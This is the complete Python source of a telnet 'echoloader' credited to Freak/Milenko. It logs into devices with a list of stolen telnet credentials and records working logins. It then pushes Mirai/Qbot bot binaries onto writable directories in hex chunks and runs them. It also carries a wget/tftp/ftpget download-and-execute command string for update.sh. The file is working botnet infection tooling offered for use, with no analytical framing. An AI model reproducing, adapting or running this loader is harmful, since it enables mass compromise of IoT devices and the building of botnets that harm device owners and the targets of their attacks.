1
#!/usr/bin/python
2
#Phaaaat hax telnet loader by Freak/Milenko
3

4
import sys, re, os, socket, time, select
5
from threading import Thread
6

7
rekdevice = "cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /; wget http://0.0.0.0/update.sh; busybox wget http://0.0.0.0/update.sh; tftp -r update.sh -g 0.0.0.0; busybox tftp -r update.sh -g 0.0.0.0; ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 0.0.0.0 update.sh update.sh; chmod 777 update.sh; busybox chmod 777 update.sh; sh update.sh; rm -rf update.sh"
8

9
if len(sys.argv) < 2:
10
    sys.exit("\033[37mUsage: python "+sys.argv[0]+" [vuln list]")
11

12
print "\033[31m"
13

14
print "S-S-SUUUPER fast telnet echoloader by Freak"
15
print
16
print "Reads ip:port user:pass and simply checks the IP for port 23 then echoloads mirai/qbot binaries"
17
print "ensure the binaries are in the \"bins\" directory under the proper dlr.ARCH filenames."
18
print "All working telnets are saved to \"bots.txt\""
19

20
threads = int(raw_input("Threads: "))
21

22
lines = open(sys.argv[1],"r").readlines()
23
import random
24
random.shuffle(lines)
25

26
global fh
27
fh = open("bots.txt","a+")
28

29
def chunkify(lst,n):
30
    return [ lst[i::n] for i in xrange(n) ]
31

32
running = 0
33

34
global echo
35
global tftp
36
global wget
37
global logins
38
global ran
39
tftp = 0
40
wget = 0
41
echo = 0
42
logins = 0
43
ran = 0
44
def printStatus():
45
    global echo
46
    global tftp
47
    global wget
48
    global logins
49
    global ran
50
    while 1:
51
        time.sleep(5)
52
        print "\033[32m[\033[31m+\033[32m] Logins: " + str(logins) + "     Ran:" + str(ran) + "  Echoes:" + str(echo) + " Wgets:" + str(wget) + " TFTPs:" + str(tftp) + "\033[37m"
53

54
def readUntil(tn, advances, timeout=8):
55
    buf = ''
56
    start_time = time.time()
57
    while time.time() - start_time < timeout:
58
        buf += tn.recv(1024)
59
        time.sleep(0.1)
60
        for advance in advances:
61
            if advance in buf: return buf
62
    return ""
63

64
def recvTimeout(sock, size, timeout=8):
65
    sock.setblocking(0)
66
    ready = select.select([sock], [], [], timeout)
67
    if ready[0]:
68
        data = sock.recv(size)
69
        return data
70
    return ""
71

72
def contains(data, array):
73
    for test in array:
74
        if test in data:
75
            return True
76
    return False
77

78
def split_bytes(s, n):
79
    assert n >= 4
80
    start = 0
81
    lens = len(s)
82
    while start < lens:
83
        if lens - start <= n:
84
            yield s[start:]
85
            return # StopIteration
86
        end = start + n
87
        assert end > start
88
        yield s[start:end]
89
        start = end
90

91
def infect(ip, username, password):
92
    global echo
93
    global tftp
94
    global wget
95
    global logins
96
    global ran
97
    infectedkey = "CAPSAICIN"
98
    try:
99
        tn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
100
        tn.settimeout(0.5)
101
        tn.connect((ip, 23))
102
    except:
103
        try:
104
            tn.close()
105
        except:
106
            pass
107
        return
108
    try:
109
        hoho = ''
110
        hoho += readUntil(tn, ":")
111
        if ":" in hoho:
112
            tn.send(username + "\n")
113
            time.sleep(0.1)
114
        hoho = ''
115
        hoho += readUntil(tn, ":")
116
        if ":" in hoho:
117
            tn.send(password + "\n")
118
            time.sleep(0.8)
119
        else:
120
            pass
121
        prompt = ''
122
        prompt += recvTimeout(tn, 8192)
123
        if ">" in prompt and "ONT" not in prompt:
124
            success = True
125
        elif "#" in prompt or "$" in prompt or "@" in prompt or ">" in prompt:
126
            success = True
127
        else:
128
            tn.close()
129
            return
130
    except:
131
        tn.close()
132
        return
133
    if success == True:
134
        try:
135
            tn.send("enable\r\n")
136
            tn.send("system\r\n")
137
            tn.send("shell\r\n")
138
            tn.send("sh\r\n")
139
            tn.send("echo -e '\\x41\\x4b\\x34\\x37'\r\n")
140
        except:
141
            tn.close()
142
            return
143
        time.sleep(1)
144
        try:
145
            buf = recvTimeout(tn, 8192)
146
        except:
147
            tn.close()
148
            return
149
        if "AK47" in buf:
150
            print "\033[32m[\033[31m+\033[32m] \033[33mGOTCHA \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
151
            logins += 1
152
            fh.write(ip + ":23 " + username + ":" + password + "\n")
153
            fh.flush()
154
#            tn.send(rekdevice + "\r\n")
155
#            time.sleep(15)
156
            buf = "" #recvTimeout(tn, 1024*1024)
157
            loaded = False
158
            if "bytes" in buf:
159
                print "\033[32m[\033[31m+\033[32m] \033[33mTFTP \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
160
                tftp += 1
161
                loaded = True
162
            elif "saved" in buf:
163
                print "\033[32m[\033[31m+\033[32m] \033[33mWGET \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
164
                wget += 1
165
                loaded = True
166
            if infectedkey in buf:
167
                ran += 1
168
                print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
169
                f=open("infected.txt", "a")
170
                f.write(ip +":23 " + username + ":" + password + "\r\n")
171
                f.close()
172
            if loaded:
173
                tn.close()
174
                return
175
            tn.send("cd /tmp || cd /home/$USER || cd /var/run || cd /mnt || cd /root || cd /\r\n")
176
            tn.send("cat /proc/mounts||busybox cat /proc/mounts\r\n")
177
            mounts = recvTimeout(tn, 1024*1024)
178
            for line in mounts.split("\n"):
179
                try:
180
                    path = line.split(" ")[1]
181
                    if " rw" in line:
182
                        tn.send("echo -e '%s' > %s/.keksec||busybox echo -e '%s' > %s/.keksec; cat %s/.keksec||busybox cat %s/.keksec; rm %s/.keksec||busybox rm %s/.keksec\r\n" % ("\\x41\\x4b\\x34\\x37", path, "\\x41\\x4b\\x34\\x37", path, path, path, path, path))
183
                        if "AK47" in recvTimeout(tn, 1024*1024):
184
                            tn.send("cd %s\r\n" % path) #cd into the writeable directory
185
                except:
186
                    continue
187
            for binary in "dlr.arm dlr.arm7 dlr.mips dlr.ppc dlr.x86 dlr.m68k dlr.mpsl dlr.sh4 dlr.spc".split(" "):
188
                binloaded = False
189
                while binloaded == False:
190
                    try:
191
                        first = True
192
                        count = 0
193
                        hexdata = []
194
                        for chunk in split_bytes(open("bins/" + binary, "rb").read(), 128):
195
                            hexdata.append(''.join(map(lambda c:'\\x%02x'%c, map(ord, chunk))))
196
                        parts = len(hexdata)
197
                        for hexchunk in hexdata:
198
                            seq = ">" if first else ">>"
199
                            tn.send("echo -ne '" + hexchunk + "' " + seq + " updDl\r\n")
200
                            first = False
201
                            count += 1
202
                            time.sleep(0.01)
203
                        print "\033[32m[\033[31m+\033[32m] \033[33mECHO \033[31m---> \033[32m" + ip + " \033[31m---> \033[36m(" + str(count) + "/" + str(parts) + ") " + binary + "\033[37m"
204
                        tn.send("chmod 777 updDl||busybox chmod 777 updDl\r\n")
205
                        tn.send("./updDl\r\n")
206
                        time.sleep(3)
207
                        tn.send("rm -rf ./updDl\r\n")
208
                        time.sleep(0.1)
209
                        tn.send("./dvrHelper\r\n")
210
                        time.sleep(1)
211
                        tn.send("rm -rf ./dvrHelper\r\n")
212
                        time.sleep(0.1)
213
                        buf = recvTimeout(tn, 1024*1024)
214
                        if "FIN" in buf:
215
                            echo += 1
216
                            print "\033[32m[\033[31m+\033[32m] \033[33mECHOLOADED \033[31m---> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[31m ---> \033[35m%s\033[37m" %(username, password, ip, binary)
217
                            tn.close()
218
                            f=open("echoes.txt","a")
219
                            f.write(ip +":23 " + username + ":" + password + "\r\n")
220
                            f.close()
221
                            return
222
                        if infectedkey in buf:
223
                            ran += 1
224
                            f=open("infected.txt", "a")
225
                            f.write(ip +":23 " + username + ":" + password + "\r\n")
226
                            f.close()
227
                            print "\033[32m[\033[31m+\033[32m] \033[35mINFECTED \033[31m-> \033[32m%s\033[37m:\033[33m%s\033[37m:\033[32m%s\033[37m"%(username, password, ip)
228
                            tn.close()
229
                            return
230
                        binloaded = True
231
                    except:
232
                        pass
233
    else:
234
        tn.close()
235
        return
236

237
def check(chunk, fh):
238
    global running
239
    running += 1
240
    threadID = running
241
    for login in chunk:
242
        try:
243
            if ":23 " in login:
244
                login = login.replace(":23 ", ":")
245
            if ":2323 " in login:
246
                login = login.replace(":2323 ", ":")
247
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
248
            s.settimeout(0.5)
249
            try:
250
                socket.inet_aton(login.split(":")[0])
251
                ip = login.split(":")[0]
252
                username = login.split(":")[1]
253
                password = login.split(":")[2]
254
            except:
255
                try:
256
                    socket.inet_aton(login.split(":")[2])
257
                    ip = login.split(":")[2]
258
                    username = login.split(":")[0]
259
                    password = login.split(":")[1]
260
                except:
261
                    continue
262
            s.connect((ip, 23))
263
            s.close()
264
            infect(ip, username, password)
265
        except:
266
            pass
267
    print "\033[32m[\033[31m+\033[32m] Thread " + str(threadID) + " has finished scanning " + str(len(chunk)) + " IPs."
268
    running -= 1
269

270
lines = map(lambda s: s.strip(), lines) # remove all newlines
271
import random
272
random.shuffle(lines)
273
chunks = chunkify(lines, threads) # make seperate chunk for each thread
274

275
print "STARTING SCAN AND LOAD!!!"
276

277
Thread(target = printStatus, args = ()).start()
278

279
for thread in xrange(0,threads):
280
    if thread >= 384:
281
        time.sleep(0.2)
282
    try:
283
        Thread(target = check, args = (chunks[thread], fh,)).start()
284
    except:
285
        pass
286
print "Scanning... Press enter 3 times to stop."
287

288
for i in range(0,3):
289
    raw_input()
290

291
fh.close()
292

293
os.kill(os.getpid(), 9)
294